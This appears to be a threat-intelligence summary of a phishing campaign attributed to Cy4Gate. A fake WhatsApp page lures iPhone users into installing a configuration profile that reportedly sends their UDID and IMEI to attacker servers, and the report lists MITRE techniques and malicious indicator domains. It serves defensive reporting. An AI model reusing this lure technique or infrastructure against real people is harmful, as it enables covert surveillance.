Researchers traced a fake WhatsApp phishing operation aimed at iPhone users, linked to an Italian surveillance company. The attack uses iPhone configuration profiles via a phishing site to push spyware and potentially exfiltrate device data. #WhatsApp #Cy4Gate #Epeius #config5-dati #config1-dati #MDM #iPhone #UDID #IMEI
Keypoints
- The operation targeted iPhone users with a phishing page designed to impersonate WhatsApp, aiming to prompt the installation of a configuration profile.
- The phishing domain cluster includes config5-dati.com and related domains (config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com), with shared infrastructure and certificates linking them.
- The page instructs users how to install a configuration profile via iPhone settings, rather than through the App Store.
- The configuration file reportedly collects device identifiers such as UDID and IMEI and sends them to a server controlled by the attacker.
- Researchers connected the activity to Cy4Gate, an Italian surveillance vendor whose products include Epeius, a lawful-intercept solution.
- WhatsApp and other researchers noted the broader risk of spyware vendors abusing legitimate app ecosystems to target individuals.
MITRE Techniques
- [T1566.002] Spearphishing Link – The phishing page is designed to look like an official WhatsApp site, with WhatsApp branding and professional graphics laying out the installation process step-by-step. The phishing page instructs visitors how to install a configuration file via the iPhone’s system settings menu. [The phishing page is designed to look like an official WhatsApp site, with WhatsApp branding and professional graphics laying out the installation process step-by-step.]
- [T1204] User Execution – “To keep in touch with your friends press the ‘download’ button and follow the instructions on the page,” the page asks users to take steps that would trigger profile installation. [To keep in touch with your friends press the ‘download’ button and follow the instructions on the page.]
- [T1036] Masquerading – The phishing page masquerades as a legitimate WhatsApp site to entice users into installing a profile. [The phishing page is designed to look like an official WhatsApp site, with WhatsApp branding and professional graphics laying out the installation process step-by-step.]
- [T1583] Acquire Infrastructure – Domain clustering and shared certificates connect multiple domains (config5-dati.com, config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com) used to host and support the phishing operation. [config5-dati[.]com domain shared an encryption certificate with other similarly named domains, revealing others such as config4-dati[.]com, config3-dati[.]com, and config6-dati[.]com.]
- [T1005] Data from Local System – The configuration file collects device identifiers (UDID and IMEI) and sends them to the attacker’s server. [the file sends information to the config1-dati server, including the UDID, or Unique Device Identifier assigned to each iOS device by Apple; and the IMEI or International Mobile Equipment Identity, another unique code that identifies cellphones.]
Indicators of Compromise
- [Domain] context – config5-dati.com, config4-dati.com, config3-dati.com, config6-dati.com, config1-dati.com, check3.it (and 2 more domains)
- [Certificate / Crypto] context – encryption certificate shared across configX-dati domains indicating linked infrastructure
- [Device Identifier] context – UDID, IMEI – data reportedly exfiltrated by the configuration profile